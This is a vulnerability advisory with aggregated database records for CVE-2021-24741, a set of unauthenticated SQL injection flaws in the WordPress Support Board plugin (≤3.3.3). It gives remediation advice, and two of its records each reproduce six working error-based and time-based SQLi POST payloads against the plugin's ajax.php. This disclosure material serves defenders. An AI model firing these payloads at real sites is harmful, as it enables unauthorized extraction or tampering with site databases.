Description
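Multiple unauthenticated SQL injection (SQLi) vulnerabilities, tracked as CVE-2021-24741, were discovered by John Jefferson Li in the WordPress Support Board plugin (versions <= 3.3.3). The plugin does not escape several POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code and recipient_id) before using them in SQL statements, so the injection points can be reached without logging in.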
## Solution
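Update the WordPress Support Board plugin to the latest available version (at least 3.3.4). Because the flaws are exploitable without authentication and proof-of-concept requests are public, sites that ran an affected version should also review web-server logs for unexpected POST requests to /wp-content/plugins/supportboard/include/ajax.php, and treat the database contents as potentially exposed if any are found.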
Affected Software
Related
{"id": "PATCHSTACK:2808AE58637DE676BE640C8E41E525B7", "vendorId": null, "type": "patchstack", "bulletinFamily": "software", "title": "WordPress Support Board plugin <= 3.3.3 - Multiple Unauthenticated SQL Injection (SQLi) vulnerabilities", "description": "Multiple Unauthenticated SQL Injection (SQLi) vulnerabilities were discovered by John Jefferson Li in the WordPress Support Board plugin (versions <= 3.3.3).\n\n## Solution\n\n\r\n Update the WordPress Support Board plugin to the latest available version (at least 3.3.4).\r\n ", "published": "2021-09-13T00:00:00", "modified": "2021-09-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://patchstack.com/database/vulnerability/supportboard/wordpress-support-board-plugin-3-3-3-multiple-unauthenticated-sql-injection-sqli-vulnerabilities", "reporter": "John Jefferson Li", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24741", "https://medium.com/@lijohnjefferson/multiple-sql-injection-unauthenticated-in-support-board-v-3-3-3-3e9b4214a4f9", 
"https://board.support/changes"], "cvelist": ["CVE-2021-24741"], "immutableFields": [], "lastseen": "2022-06-01T19:30:21", "viewCount": 7, "enchantments": {"score": {"value": 2.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0752"]}, {"type": "cve", "idList": ["CVE-2021-24741"]}, {"type": "githubexploit", "idList": ["1D1D02B2-39A1-5329-8EB0-8A61D78F15B9"]}, {"type": "wpexploit", "idList": ["WPEX-ID:CCF293EC-7607-412B-B662-5E237B8690CA"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:CCF293EC-7607-412B-B662-5E237B8690CA"]}]}, "affected_software": {"major_version": [{"name": "support board", "version": 3}]}, "vulnersScore": 2.4}, "_state": {"score": 1660007483, "dependencies": 1660004461, "affected_software_major_version": 1666695388}, "_internal": {"score_hash": "ddfaec7d832a396750f5e2b24a264c9a"}, "affectedSoftware": [{"version": "3.3.3", "operator": "le", "name": "support board"}], "vendor_cvss": {"score": "3.1", "severity": "Critical severity"}, "owasp": "A1: Injection", "classification": "SQL Injection"}
{"wpvulndb": [{"lastseen": "2021-11-26T19:16:07", "description": "The plugin does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.\n\n### PoC\n\nThe login-cookie parameter is needed, but does not require to be logged in. \\----- PoC 1: Error Based SQLi (status_code) ----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: status_code (POST) function=new-conversation&status;_code=2\"+AND+EXTRACTVALUE(4597,CONCAT(\"\",\"DB+Name:+\",(SELECT+(ELT(4597=4597,\"\"))),database()))+AND+\"fKoo\"=\"fKoo&title;=&department;=&agent;_id=&routing;=false&login-cookie;=&user;_id=46&language;=false \\----- PoC 2: Error Based SQLi (department)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: department (POST) function=new-conversation&status;_code=2o&title;=&department;=(UPDATEXML(5632,CONCAT(0x2e,\"Database+Name:+\",(SELECT+(ELT(5632=5632,\"\"))),database()),3004))&agent;_id=&routing;=false&login-cookie;=&user;_id=46&language;=false \\----- PoC 3: Error Based SQLi (user_id) ----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: user_id (POST) function=send-message&user;_id=-5\"+AND+GTID_SUBSET(CONCAT(\"Database+Name:+\",(SELECT+(ELT(3919=3919,\"\"))),database()),3919)+AND+\"wrOJ\"=\"wrOJ&conversation;_id=35&message;=TEST+POC&conversation;_status_code=false&queue;=false&payload;=false&recipient;_id=false&login-cookie;=&language;=false \\----- PoC 4: Time Based SQLi (conversation_id)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: conversation_id (POST) function=send-message&user;_id=5&conversation;_id=45\"+AND+(SELECT 
1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message;=test+&conversation;_status_code=false&queue;=false&payload;=false&recipient;_id=false&login-cookie;=&language;=false \\----- PoC 5: Time Based SQLi (conversation_status_code)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: conversation_status_code (POST) function=send-message&user;_id=5&conversation;_id=45&message;=test+&conversation;_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue;=false&payload;=false&recipient;_id=false&login-cookie;=&language;=false \\----- PoC 6: Time Based SQLi (recipient_id)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: recipient_id (POST) function=send-message&user;_id=5&conversation;_id=45&message;=test+&conversation;_status_code=false&queue;=false&payload;=false&recipient;_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie;=&language;=false\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T00:00:00", "type": "wpvulndb", "title": "Support Board < 3.3.4 - Multiple Unauthenticated SQL Injections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24741"], "modified": "2021-09-15T13:37:35", "id": "WPVDB-ID:CCF293EC-7607-412B-B662-5E237B8690CA", "href": "https://wpscan.com/vulnerability/ccf293ec-7607-412b-b662-5e237b8690ca", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:57", "description": "An SQL injection vulnerability exists in Support Board WordPress plugin before 3.3.4. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-10T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Support Board Plugin SQL Injection (CVE-2021-24741)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24741"], "modified": "2021-10-10T00:00:00", "id": "CPAI-2021-0752", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T15:03:20", "description": "The Support 
Board WordPress plugin before 3.3.4 does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-20T10:15:00", "type": "cve", "title": "CVE-2021-24741", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24741"], "modified": "2021-10-01T18:35:00", "cpe": [], "id": "CVE-2021-24741", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24741", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "wpexploit": [{"lastseen": "2021-11-26T19:16:07", "description": "The plugin does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T00:00:00", "type": "wpexploit", "title": "Support Board < 3.3.4 - Multiple Unauthenticated SQL Injections", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24741"], "modified": "2021-09-15T13:37:35", "id": "WPEX-ID:CCF293EC-7607-412B-B662-5E237B8690CA", "href": "", "sourceData": "The login-cookie parameter is needed, but does not require to be logged in.\r\n\r\n----- PoC 1: Error Based SQLi (status_code) -----\r\n\r\nRequest \r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: status_code (POST)\r\n\r\nfunction=new-conversation&status_code=2\"+AND+EXTRACTVALUE(4597,CONCAT(\"\",\"DB+Name:+\",(SELECT+(ELT(4597=4597,\"\"))),database()))+AND+\"fKoo\"=\"fKoo&title=&department=&agent_id=&routing=false&login-cookie=&user_id=46&language=false\r\n\r\n\r\n----- PoC 2: Error Based SQLi (department)-----\r\n\r\nRequest \r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: department 
(POST)\r\n\r\nfunction=new-conversation&status_code=2o&title=&department=(UPDATEXML(5632,CONCAT(0x2e,\"Database+Name:+\",(SELECT+(ELT(5632=5632,\"\"))),database()),3004))&agent_id=&routing=false&login-cookie=&user_id=46&language=false\r\n\r\n\r\n----- PoC 3: Error Based SQLi (user_id) -----\r\n\r\nRequest \r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: user_id (POST)\r\n\r\nfunction=send-message&user_id=-5\"+AND+GTID_SUBSET(CONCAT(\"Database+Name:+\",(SELECT+(ELT(3919=3919,\"\"))),database()),3919)+AND+\"wrOJ\"=\"wrOJ&conversation_id=35&message=TEST+POC&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false\r\n\r\n\r\n----- PoC 4: Time Based SQLi (conversation_id)-----\r\n\r\nRequest\r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: conversation_id (POST)\r\n\r\nfunction=send-message&user_id=5&conversation_id=45\"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false\r\n\r\n\r\n----- PoC 5: Time Based SQLi (conversation_status_code)-----\r\n\r\nRequest\r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: conversation_status_code (POST)\r\n\r\nfunction=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue=false&payload=false&recipient_id=false&login-cookie=&language=false\r\n\r\n\r\n----- PoC 6: Time Based SQLi (recipient_id)-----\r\n\r\nRequest\r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: recipient_id 
(POST)\r\n\r\nfunction=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie=&language=false", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-03-17T22:50:49", "description": "# CVE-2021-24741\n\n#### Multiple SQL Injection (Unauthenticated) ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-28T18:34:40", "type": "githubexploit", "title": "Exploit for SQL Injection in Schiocco Support Board - Chat And Help Desk", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24741"], "modified": "2022-03-17T13:42:12", "id": "1D1D02B2-39A1-5329-8EB0-8A61D78F15B9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}]}